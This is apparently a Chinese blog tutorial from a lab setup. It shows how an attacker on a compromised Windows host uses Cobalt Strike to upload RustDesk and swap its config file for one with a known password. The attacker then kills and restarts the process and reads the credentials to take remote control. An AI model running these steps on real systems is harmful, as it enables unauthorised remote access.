[横向移动] 远控优化 — 通过 “RustDESK” 获取远程桌面

🌟想系统化学习内网渗透?****看看这个:[内网安全] 内网渗透 - 学习手册-CSDN博客

https://github.com/rustdesk/rustdeskhttps://github.com/rustdesk/rustdesk

0x01:RustDESK --- 工具介绍

RustDesk 是一款开箱即用的远程桌面软件,无需任何配置,完美替代 TeamViewer。用户可以完全掌控数据,不用担心安全问题。该项目是完全开源的,用户可以搭建自己的注册/中继服务器,当然,也可以直接使用官方提供的服务器。

0x02:RustDESK --- 获取远程桌面原理

RustDesk 获取远程桌面的原理与我们之前讲解的 ToDesk 类似,都是通过修改目标本地的配置文件以使未知的验证码变得已知,进而对目标发起远控。

0x03:RustDESK --- 获取远程桌面操作

环境配置

  • 攻击机(Kali Linux):172.16.0.103 --- 安装了 Cobalt Strike 服务端与客户端

  • 靶机(WIndows 7):172.16.0.122

0x0301:上传并运行 RustDESK

假设内网渗透中,你已经拿下了一个目标靶机,此时想远程桌面它,那么你就可以考虑使用这个工具。首先通过 Cobalt Strike 将工具上传到靶机中:

然后使用下面的命令直接运行 RustDesk 即可,它是一款便携程序,是不用安装的:

bash 复制代码
shell C:\Users\Administrator\Desktop\rustdesk-1.1.9.exe

0x0302:定位 RustDESK 配置文件

RustDesk 运行后,会在本地生成一个配置文件,里面包括了机器的识别码和验证码。我们可以通过下面这条命令,来查看 RustDESK 的配置文件:

bash 复制代码
shell type C:\Users\用户名\AppData\Roaming\RustDesk\config\RustDesk.toml

可以看到,刚刚安装的 RustDESK 的配置文件里是没有 password 的,我们得给它加上。

0x0303:偷天换日之篡改 RustDESK 配置文件

我们将靶机的 RustDESK 配置文件的内容复制下来,并给它手动加上一个 Password:

bash 复制代码
id = '113769990'
password = 'qrrtyi'
salt = '6k2mt4'
key_pair = [
    [
    83,
    183,
    170,
    77,
    217,
    78,
    138,
    247,
    86,
    60,
    117,
    114,
    91,
    110,
    237,
    121,
    16,
    127,
    189,
    86,
    186,
    80,
    121,
    150,
    173,
    189,
    130,
    250,
    84,
    208,
    200,
    104,
    251,
    61,
    17,
    68,
    77,
    101,
    240,
    192,
    177,
    34,
    253,
    150,
    194,
    220,
    21,
    2,
    136,
    245,
    77,
    89,
    96,
    128,
    214,
    48,
    194,
    176,
    228,
    217,
    110,
    112,
    174,
    244,
],
    [
    251,
    61,
    17,
    68,
    77,
    101,
    240,
    192,
    177,
    34,
    253,
    150,
    194,
    220,
    21,
    2,
    136,
    245,
    77,
    89,
    96,
    128,
    214,
    48,
    194,
    176,
    228,
    217,
    110,
    112,
    174,
    244,
],
]
key_confirmed = true
​
[keys_confirmed]
rs-ny = true

然后我们通过 Cobalt Strike 删除目标机器上原有的配置文件,并在本地创建一个 RustDesk.toml 文件,里面的内容就是我们上面修改的,并将该文件上传到靶机中:

0x0304:重启靶机 RustDESK

篡改完目标的配置文件后,我们还需要让目标的 RustDESK 重启以加载配置文件。首先通过下面的命令,找到目标正在运行的 RustDESK 进程的 PID 号:

bash 复制代码
tasklist | findstr "rust"

然后通过下面的命令强制关闭该进程:

bash 复制代码
taskkill /pid 2884 /F

最后,我们再通过一开始的命令重启靶机的 RustDesk 让其加载我们篡改过的配置文件:

bash 复制代码
shell C:\Users\Administrator\Desktop\rustdesk-1.1.9.exe

0x0305:查看靶机 RustDESK 密码并进行远控

靶机的 RustDESK 已经开始运行了,此时我们再尝试读一下它的配置文件:

bash 复制代码
shell type C:\Users\用户名\AppData\Roaming\RustDesk\config\RustDesk.toml

如上,成功拿到远控的账号和密码,此时我们就可以在攻击端也启动一个 RustDesk 然后输入上面获取到的信息对目标进行远控啦。


笔者实验采用的 RustDESK 版本是 1.1.9 的,已经属于老版本了,它建立的远控很不稳定,如果实战中想要使用,建议去参考官方的自建中继器。对于新版的 RustDESK 笔者也看了,它的 ID 做了加密,笔者没破解出来,不过其实也无所谓,我们还可以尝试直接去替换目标的配置文件来达到修改工具 ID 与密码的目的(密码可以修改,因为它似乎是本地验证,但是 ID 不确定改了会不会有问题,因为笔者怀疑它的 ID 与机器码绑定了)。

相关推荐
Eastmount2 分钟前
[论文阅读] (49)JNCA24 网络威胁狩猎演化技术综述
论文阅读·网络安全·sci·威胁情报·威胁狩猎
zjeweler4 分钟前
网安护网面试-3-鸿鹄科技护网面试
科技·网络安全·面试·职场和发展·护网行动
攻城狮在此7 分钟前
华为企业网二层交换、三层交换、出口路由组网配置案例(OSPF动态路由)
网络·架构
七夜zippoe8 分钟前
OpenClaw 多代理协作编排:构建企业级智能协作网络
网络·工作流·openclaw·多代理协作·对等协作
会员果汁2 小时前
网络工程-路由策略概述
网络
mounter6258 小时前
【硬核前沿】CXL 深度解析:重塑数据中心架构的“高速公路”,Linux 内核如何应对挑战?-- CXL 协议详解与 LSF/MM 最新动态
linux·服务器·网络·架构·kernel
兄弟加油,别颓废了。9 小时前
给她ctf.show
网络安全
ACP广源盛1392462567310 小时前
破局 Type‑C 切换器痛点@ACP#GSV6155+LH3828/GSV2221+LH3828 黄金方案
c语言·开发语言·网络·人工智能·嵌入式硬件·计算机外设·电脑
嵌入式小企鹅12 小时前
蓝牙学习系列(八):BLE L2CAP 协议详解
网络·学习·蓝牙·ble·协议栈·l2cap
广州灵眸科技有限公司13 小时前
为RK3588注入澎湃算力:RK1820 AI加速卡完整适配与评测指南
linux·网络·人工智能·物联网·算法